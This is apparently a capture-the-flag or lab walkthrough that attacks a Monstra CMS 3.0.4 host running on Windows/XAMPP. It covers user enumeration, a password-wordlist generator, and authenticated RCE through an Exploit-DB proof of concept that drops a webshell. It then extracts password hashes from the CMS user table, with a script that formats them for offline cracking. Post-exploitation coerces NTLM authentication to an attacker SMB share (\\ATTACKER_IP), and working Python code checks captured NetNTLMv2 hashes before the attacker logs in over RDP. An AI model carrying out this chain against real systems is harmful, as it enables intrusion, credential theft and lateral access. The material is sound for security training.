Monstra CMS

Monstra CMS 3.0.4 exposes a user enumeration path and, once a valid admin-panel credential is in hand, an authenticated RCE path that ends in a webshell. On Windows/XAMPP targets Apache is typically started from the XAMPP control panel under an ordinary local user's account (or as SYSTEM when installed as a service) rather than a dedicated low-privileged service account, so the webshell may land directly in a real user's context.

Discovery

Useful indicators (a Win64 Apache banner carrying OpenSSL and PHP version strings is typical of a XAMPP bundle):

80/tcp open  http  Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.3.10)
|_http-title: Mike Wazowski

Nmap HTTP enum may reveal a blog path:

http-enum:
  /blog/: Blog

Add the discovered virtual host to /etc/hosts before browsing (TARGET is the target IP address):

TARGET monster.pg

Monstra indicators:

http://monster.pg/blog/
Welcome to your new Monstra powered website.

http://monster.pg/blog/admin/
(c) 2012 - 2016 Monstra - Version 3.0.4

Nuclei may also identify it:

[metatag-cms] Powered by Monstra 3.0.4
[monstracms-detect] 3.0.4
[monstra-admin-panel] /blog/admin/index.php

User Enumeration

Monstra user profile pages may be reachable without authentication, which allows registered accounts to be enumerated:

Observed users:

Useful profile details:

Build a small target-specific wordlist from the main site and blog:
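The wordlist step, as an added example in Python (not part of the original page or of any Monstra tooling): it strips visible text and title/alt/content attributes out of fetched HTML, keeps words of four or more characters, harvests four-digit years such as the ones in a copyright footer, and mangles each base word into common password shapes. The HTML in SAMPLE_PAGES is constructed sample content standing in for the fetched main site and blog, and the suffix set is an assumption.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages, not content fetched from any real target.
SAMPLE_PAGES = [
    """<html><head><title>Mike Wazowski</title>
    <meta name="description" content="Scare floor results">
    <script>var tracking = "ignoreme";</script></head>
    <body><h1>Monsters Inc</h1><img alt="James P. Sullivan" src="s.png">
    <p>Top scarer of 2001. Contact sulley@monsters.inc</p></body></html>""",
    """<html><body><p>Welcome to your new Monstra powered website.</p>
    <footer>(c) 2012 - 2016 Monstra - Version 3.0.4</footer></body></html>""",
]


class _TextExtractor(HTMLParser):
    """Collect visible text plus title/alt/content attributes, skipping script/style bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        for name, value in attrs:
            if name in ("title", "alt", "content") and value:
                self.parts.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def page_text(html):
    parser = _TextExtractor()
    parser.feed(html)
    return " ".join(parser.parts)


def extract_words(pages, min_len=4):
    """Unique words (case-insensitive, first spelling kept) of at least min_len characters."""
    seen = {}
    for html in pages:
        for word in re.findall(r"[A-Za-z][A-Za-z0-9]*", page_text(html)):
            if len(word) >= min_len and word.lower() not in seen:
                seen[word.lower()] = word
    return list(seen.values())


def extract_years(pages):
    """Four-digit years on the pages; copyright footers are a common source."""
    years = set()
    for html in pages:
        years.update(re.findall(r"\b((?:19|20)\d{2})\b", page_text(html)))
    return sorted(years)


def build_wordlist(pages, suffixes=("", "1", "123", "!", "@")):
    """Mangle each base word into common password shapes: three case forms,
    the assumed suffix set, and the years seen on the site (with and without '!')."""
    years = extract_years(pages)
    candidates = {}
    for word in extract_words(pages):
        for form in (word.lower(), word.capitalize(), word.upper()):
            for suffix in suffixes:
                candidates[form + suffix] = None
            for year in years:
                candidates[form + year] = None
                candidates[form + year + "!"] = None
    return list(candidates)


if __name__ == "__main__":
    print("\n".join(build_wordlist(SAMPLE_PAGES)))
```

Feed real pages in by fetching each URL and passing the response bodies as the list; the output is small enough to try against the admin login directly, and it is worth keeping the base words as a separate list for later steps.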

Working credential:

Authenticated RCE

References:

Run the working Exploit-DB 52038 PoC against the admin panel with the recovered credential:

Successful output:

Use the webshell:

Successful execution context:

Credential Files

Monstra is a flat-file CMS, so its user database is an XML table stored under the web root and can be read directly through the webshell:

Useful fields include login, password (a hash, not cleartext), email, role, and hash. Collect every password hash for offline cracking and note which logins carry the admin role.
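Parsing the retrieved table, as an added example (not Monstra's own code): the wrapper elements in SAMPLE_TABLE are an assumed layout around the field names listed above, the hash values are placeholders, and the e-mail addresses are made up, so only the per-user element walk should be relied on. It lists privileged accounts, writes login:hash lines for an offline cracker, and flags hashes shared between accounts.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the style of a Monstra XML table; wrapper element names are assumed.
SAMPLE_TABLE = """<?xml version="1.0" encoding="utf-8"?>
<root>
  <users>
    <user>
      <id>1</id>
      <login>admin</login>
      <password>0123456789abcdef0123456789abcdef</password>
      <email>admin@monster.pg</email>
      <role>admin</role>
      <hash>fedcba9876543210fedcba9876543210</hash>
    </user>
    <user>
      <id>2</id>
      <login>mike</login>
      <password>abcdef0123456789abcdef0123456789</password>
      <email>mike@monster.pg</email>
      <role>editor</role>
      <hash>76543210fedcba9876543210fedcba98</hash>
    </user>
    <user>
      <id>3</id>
      <login>sulley</login>
      <password>abcdef0123456789abcdef0123456789</password>
      <email>sulley@monster.pg</email>
      <role>user</role>
      <hash>3210fedcba9876543210fedcba987654</hash>
    </user>
  </users>
</root>
"""

FIELDS = ("id", "login", "password", "email", "role", "hash")


def parse_users(xml_text):
    """Return one dict per <user> element, wherever it sits in the tree."""
    raw = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(raw)
    users = []
    for node in root.iter("user"):
        record = {field: (node.findtext(field) or "").strip() for field in FIELDS}
        if record["login"]:
            users.append(record)
    return users


def privileged(users):
    """Accounts whose role is admin, i.e. the ones that reach the admin panel."""
    return [u for u in users if u["role"] == "admin"]


def cracker_lines(users):
    """login:hash lines for an offline cracker run with --username."""
    return [f"{u['login']}:{u['password']}" for u in users if u["password"]]


def shared_hashes(users):
    """Password hashes reused by more than one account: cracking one unlocks all of them."""
    by_hash = {}
    for u in users:
        if u["password"]:
            by_hash.setdefault(u["password"], []).append(u["login"])
    return {h: logins for h, logins in by_hash.items() if len(logins) > 1}


if __name__ == "__main__":
    users = parse_users(SAMPLE_TABLE)
    print("admins:", [u["login"] for u in privileged(users)])
    print("\n".join(cracker_lines(users)))
    print("shared:", shared_hashes(users))
```

The hash algorithm Monstra uses is not asserted here; check the CMS source for the password function before picking a cracker mode.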

Post-Exploitation

From the Monstra command shell, force the current Windows user to authenticate to an attacker SMB listener, for example by making the shell touch a UNC path on the attacker host (dir \\ATTACKER_IP\share) while Responder or impacket-smbserver is listening on 445:

Crack the captured NetNTLMv2 hash with Hashcat mode 5600 (the capture line carries user, domain, server challenge, NTProofStr and blob, so everything except the password is known); the target-specific wordlist from the enumeration step is a reasonable first pass. In the observed path, the cracked credential was:

Use the credential for RDP access (3389 must be reachable from the attacker host), then continue local Windows privilege escalation from an interactive session.
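What mode 5600 actually verifies, as an added example that is not part of this page: the NetNTLMv2 derivation (MD4 NT hash, HMAC-MD5 over the upper-cased user plus domain, HMAC-MD5 over server challenge plus blob) in Python, with a capture line constructed from a known password so the check runs offline. User, domain, challenges and blob contents are made up; MD4 is coded inline because OpenSSL 3 builds often omit it.

```python
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, coded inline because OpenSSL 3 builds often omit it."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE encoded password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge || blob."""
    key = ntlmv2_hash(password, user, domain)
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def av_pair(av_id: int, value: str) -> bytes:
    data = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


# Made-up target info: NetBIOS domain (0x0002), NetBIOS computer name (0x0001), MsvAvEOL.
TARGET_INFO = av_pair(2, "MONSTER") + av_pair(1, "MONSTER") + struct.pack("<HH", 0, 0)


def make_blob(client_challenge: bytes, target_info: bytes, timestamp: int = 0) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: version header, reserved, FILETIME, client nonce, AV pairs."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def capture_line(password, user, domain, server_challenge: bytes, blob: bytes) -> str:
    """Format a capture the way Responder writes it and hashcat -m 5600 reads it."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def check_candidate(line: str, password: str) -> bool:
    """Recompute NTProofStr for one candidate and compare it with the captured one."""
    user, _, domain, challenge, proof, blob = line.strip().split(":", 5)
    expected = nt_proof(password, user, domain, bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(expected, bytes.fromhex(proof))


if __name__ == "__main__":
    # Constructed capture; a real one comes from the SMB listener's log.
    line = capture_line("Summer2016!", "mike", "MONSTER", os.urandom(8),
                        make_blob(os.urandom(8), TARGET_INFO))
    print(line)
    for guess in ("password", "Summer2016!"):
        print(f"{guess!r}: {check_candidate(line, guess)}")
```

Two things it makes visible: the user name is upper-cased before hashing, so its case in the capture does not matter, while the domain string is used exactly as captured, so a wrong domain case breaks the check; and every input except the password sits in the capture line, which is why a captured NetNTLMv2 exchange cracks offline at HMAC-MD5 speed.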
